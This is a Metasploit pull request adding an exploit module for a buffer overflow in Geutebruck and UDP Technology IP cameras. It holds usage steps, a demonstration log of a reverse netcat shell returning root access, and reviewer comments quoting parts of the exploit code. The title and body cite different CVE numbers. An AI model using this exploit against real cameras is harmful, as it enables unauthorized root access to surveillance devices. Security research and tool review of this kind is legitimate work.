CVE 2021 33549 exploit
rapid7/metasploit-framework pull request #15488
Opened 2021-07-28 02:21 UTC by TrGFxX

This exploit a buffer overflow (CVE-2021-33550) in the web interface of the Geutebruck G-Cam and G-Code products.
Many brands use the same firmware:
  * UDP Technology (which is also the supplier of the firmware for the other vendors)
  * Ganz
  * Visualint
  * Cap
  * THRIVE Intelligence
  * Sophus
  * VCA
  * TripCorps
  * Sprinx Technologies
  * Smartec
  * Riva
 
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03 and the blogpost about the issue : https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/geutebruck_instantrec_bof`
- [ ] `set lhost <metasploit_ip>`
- [ ] `set rhosts <camera_ip>`
- [ ] `check` to be sure the target is vulnerable
- [ ] `exploit`
- [ ] You should get a shell

## Demonstration
### Exploitation 
```
msf6 > use exploit/linux/http/geutebruck_instantrec_bof
[*] Using configured payload cmd/unix/reverse_netcat_gaping
msf6 exploit(linux/http/geutebruck_instantrec_bof) > set lhost 192.168.14.1
lhost => 192.168.14.1
msf6 exploit(linux/http/geutebruck_instantrec_bof) > set rhosts 192.168.14.58
rhosts => 192.168.14.58
msf6 exploit(linux/http/geutebruck_instantrec_bof) > exploit

[*] Started reverse TCP handler on 192.168.14.1:4444
[*] 192.168.14.58:80 - Attempting to exploit...
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2021-02-23 13:37:28 +0200
pwd

/tmp/www_ramdisk/uapi-cgi/admin
id
uid=0(root) gid=0(root)
uname -a
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-g3532e87a #1 PREEMPT Tue May 12 18:00:46 KST 2020 armv5tejl GNU/Linux
```

2021-07-28 02:36 UTC, bcoles commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +$add_str = $libc_data_off + $libc_add + 4
Please don't use globals.

These should be defined in a method or within a `target`.

If you modified `write_string` to return the rop chain then these cal all be moved into that method.

2021-07-28 02:36 UTC, bcoles commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +       'Ibrahim Ayadhi - RandoriSec', # Metasploit Module
```suggestion
          'Titouan Lazard - RandoriSec', # Discovery
          'Ibrahim Ayadhi - RandoriSec', # Metasploit Module
```

2021-07-28 02:36 UTC, bcoles commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +            [ 'URL', 'http://geutebruck.com' ],
```suggestion
            ['URL', 'http://geutebruck.com'],
```

2021-07-28 02:36 UTC, bcoles commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +        OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/../uapi-cgi/instantrec.cgi']),
is the traversal required? If the `..` traversal sequence is important for exploitation it should be implemented/enforced within the module code, rather than in a user-configurable option.

2021-07-28 02:36 UTC, bcoles commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +
```suggestion

```

2021-07-28 02:36 UTC, bcoles commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +    sock.put(buf)
The payload is only sent within the POST data in the request body. Is there a reason not to use `send_request_cgi()` ? If encoding is a problem you cold opt out with `'encode_params' => false` or use `send_request_raw()` instead.

2021-07-28 15:22 UTC, red0xff requested changes

2021-07-28 15:22 UTC, red0xff commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +    end
just a comment on coding style.

```ruby
chunks.each_with_index do|chunk, index|
   ...
end
```

2021-07-28 15:22 UTC, red0xff commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +    chunks += [cur]
It looks like you are just trying to unpack some binary data as an array of little-endian integers.
```ruby
chunks = (string.raw+' '*(4 - string.raw.length%4)).unpack('I<*')
```
instead of this loop.

2021-08-13 22:31 UTC, space-r7 commented on documentation/modules/exploit/linux/http/geutebruck_instantrec_bof.md
> +Successful exploitation will result inremote code execution as the `root` user.
```suggestion
Successful exploitation will result in remote code execution as the `root` user.
```

2021-08-13 22:31 UTC, space-r7 commented on modules/exploits/linux/http/geutebruck_instantrec_bof.rb
> +    uri = "/" + Rex::Text.rand_hostname + target_uri.path
```suggestion
    uri = normalize_uri('/', Rex::Text.rand_hostname, target_uri.path)
```

2021-08-20 16:06 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2021-08-26 15:36 UTC, red0xff requested changes

2021-08-26 22:51 UTC, closed without merging